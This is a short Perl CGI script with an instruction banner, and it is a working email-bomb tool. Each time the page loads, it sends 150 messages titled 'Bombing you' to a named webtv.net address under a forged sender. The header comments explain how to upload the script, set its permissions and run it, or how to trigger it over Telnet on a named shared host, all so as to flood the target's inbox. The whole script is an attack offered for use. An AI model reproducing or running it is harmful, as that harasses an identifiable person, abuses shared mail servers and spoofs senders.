#!/usr/local/bin/perl
###################################################
# Script by krakle!!!! Transload this to your #
# account in ASCII mode, then goto your site #
# manager and chmod to 755 then view the page #
# then you will have successfully flooded me!! #
# Also if you are to lazy to install this script #
# if you have an account on server34 on hypermart #
# With a Telnet type the following first to get #
# in cd /data1/hypermart.net/isoropyl #
# then type perl mail.txt and you will see the #
# finished screen and then you have flooded me #
# pretty easy so why do you not go out and try it #
###################################################
print "Content-type:text/html\n\n";
$kill = 150;
for ($e = 1; $e <= $kill; $e++) {
open(MAIL,"|/var/qmail/bin/qmail-inject");
print MAIL "To: Isoropyl\@webtv.net\n";
print MAIL "From: Bomber\@webtv.net\n";
print MAIL "Subject: Bombing you\n\n";
print MAIL "Bombing you --giggles--\n";
close(MAIL);
}
print "Bombing hysteria is finished
\n";
print "To rebomb This person reload page";
exit;